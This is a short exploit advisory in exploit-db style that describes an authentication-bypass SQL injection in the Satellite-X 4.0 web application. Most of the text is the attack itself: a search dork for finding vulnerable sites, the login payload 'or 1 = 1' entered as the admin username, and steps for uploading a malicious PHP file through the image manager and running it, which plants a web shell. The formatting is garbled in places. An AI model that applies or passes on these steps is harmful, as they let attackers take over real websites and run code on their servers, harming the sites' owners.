========================================================== ========================================================== ==========
| # Title: Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability
| # Author: indoushka
# Web Site:
| # Dork: 2009©Satellite-X
| # Tested on: windows SP2 franzais V. (Pnx2 2.0) + Lunix franzais v. (9.4 Ubuntu)
| # Bug: (Auth Bypass) SQL Injection
================================== Exploit By indoushka ====================== ============================
# Exploit:
1-http: // 127.0.0.1/satallitex/admin/index. php
2-username: or 1 = 1
Password: 1nd0u
3-Go To http: // 127.0.0.1/satallitex/admin/index. php? Config = imagesman (2 Upload Ev! L)
4-http: // 127.0.0.1/satallitex/img/Ch99.php (2 Find Ev! L)
Dz-Ghost Team ==== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========== ========
Greetz:
Exploit-db Team:
(Loneferret + Exploits + dookie2000ca)
Bytes ---------------------------------------------------------------------------------------------------------------